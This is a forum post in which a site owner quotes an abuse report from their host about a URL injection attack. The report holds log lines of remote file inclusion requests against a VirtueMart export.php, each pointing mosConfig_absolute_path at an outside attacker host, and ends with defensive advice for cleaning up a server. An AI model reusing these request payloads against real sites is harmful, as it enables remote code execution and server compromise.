URL Injection Attacks

Hi, I just recovered (I think) from the Iframe Injection Attack now I have been informed by my host of a URL Injection Attack, I'm not sure if they are related problems or separate, but in any event I need to stop the URL Injection Attack.


From my host:

Hi,

We have received the following abuse report against your account. Please check the vps thoroughly for any vulnerable/suspicious process. Also make sure all scripts installed in your accounts are up to date and accounts passwords are updated regularly (always use strong password, combination of lower/upper case letters, numbers, symbols etc).

Report can be found below. Let us know the steps you have taken to resolve the issue.

--------------------------------------
Greetings:

IP Address of attacker: **.**.***.**

Type of attack: URL Injection -- attempt to inject / load files onto the
server via PHP/CGI vulnerabilities

Sample log report including date and time stamp (1st field is \"request\", 2nd
field is the IP address or the domain name being attacked, and the 3rd field
is the IP address or domain name of the attacker):

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:14 -0400] \"GET
/index.php?option=com_content&task=view&id=572&Itemid=84/administrator/compo
nents/com_virtuemart/export.php?mosConfig_absolute_path=http://203.128.246.1
07:32000/temp//id.gif? HTTP/1.1\" 500 3560 \"-\" \"Mozilla/5.0\"
SquYUkYmP6kAAAIGIss \"-\"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:14 -0400] \"GET
/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=
http://203.128.246.107:32000/temp//id.gif? HTTP/1.1\" 500 3560 \"-\"
\"Mozilla/5.0\" SquYUkYmP6kAAAH7HFM \"-\"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:36 -0400] \"GET
/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=
http://203.128.246.107:32000/temp//id.gif? HTTP/1.1\" 500 3560 \"-\"
\"Mozilla/5.0\" SquYaEYmP6kAAAINJmc \"-\"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:36 -0400] \"GET
/index.php?option=com_content&task=view&id=572&Itemid=84/adminis
trator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://2
03.128.246.107:32000/temp//id.gif? HTTP/1.1\" 500 3560 \"-\" \"Mozilla/5.0\"
SquYaEYmP6kAABP8Plg \"-\"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:43 -0400] \"GET
/index.php?option=com_content&task=view&id=572&Itemid=84/adminis
trator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://2
03.128.246.107:32000/temp//id.gif? HTTP/1.1\" 500 3560 \"-\" \"Mozilla/5.0\"
SquYb0YmP6kAAAJCJ5Y \"-\"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:43 -0400] \"GET
/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=
http://203.128.246.107:32000/temp//id.gif? HTTP/1.1\" 500 3560 \"-\"
\"Mozilla/5.0\" SquYb0YmP6kAAAIGItc \"-\"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:43 -0400] \"GET
/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=
http://203.128.246.107:32000/temp//id.gif? HTTP/1.1\" 500 3560 \"-\"
\"Mozilla/5.0\" SquYb0YmP6kAABP8Plo \"-\"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:43 -0400] \"GET
/index.php?option=com_content&task=view&id=572&Itemid=84/adminis
trator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://2
03.128.246.107:32000/temp//id.gif? HTTP/1.1\" 500 3560 \"-\" \"Mozilla/5.0\"
SquYb0YmP6kAABP7PWU \"-\"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:48 -0400] \"GET
/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=
http://203.128.246.107:32000/temp//id.gif? HTTP/1.1\" 500 3560 \"-\"
\"Mozilla/5.0\" SquYdEYmP6kAABP7PWY \"-\"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:47:48 -0400] \"GET
/index.php?option=com_content&task=view&id=572&Itemid=84/adminis
trator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://2
03.128.246.107:32000/temp//id.gif? HTTP/1.1\" 500 3560 \"-\" \"Mozilla/5.0\"
SquYdEYmP6kAAAH8H40 \"-\"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:48:47 -0400] \"GET
/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=
http://203.128.246.107:32000/temp//id.gif? HTTP/1.1\" 500 3560 \"-\"
\"Mozilla/5.0\" SquYr0YmP6kAAAJHKnQ \"-\"

Request: rieas.gr **.**.***.** - - [12/Sep/2009:08:48:47 -0400] \"GET
/index.php?option=com_content&task=view&id=572&Itemid=84/adminis
trator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://2
03.128.246.107:32000/temp//id.gif? HTTP/1.1\" 500 3560 \"-\" \"Mozilla/5.0\"
SquYr0YmP6kAAAJEKFs \"-\"

NOTES:

URL Injection attacks typically mean the server for which the IP address of
the attacker is bound is a compromised server.

Please check the server behind the IP address above for suspicious files in
/tmp, /var/tmp, /dev/shm, /var/spool/samba, /var/spool/vbox,
/var/spool/squid, and /var/spool/cron Please use \"ls -lab\" for checking
directories as sometimes compromised servers will have hidden files that a
regular \"ls\" will not show.

Please also check the process tree (ps -efl or ps -auwx) for suspicious
processes; often times the malware / hack pretends to be an Apache process.

Clam Anti-virus, clamscan, can also be used to find commonly used PHP and
Perl-based hacks, including various php shells, on a server using the
\"--infected\" and \"--recursive\" options.

You may also want to check out using root kit detection tools -
http://www.chkrootkit.org/, http://www.rootkit.nl/, and http://
http://www.ossec.net/en/rootcheck.html as tools which should be used in
addition to checking the directories and process tree.

### EOF NOTES ###

Please take appropriate action to stop these attacks from happening.

Thank you very much for your time.
Any suggestions?

 

 

 

 

Top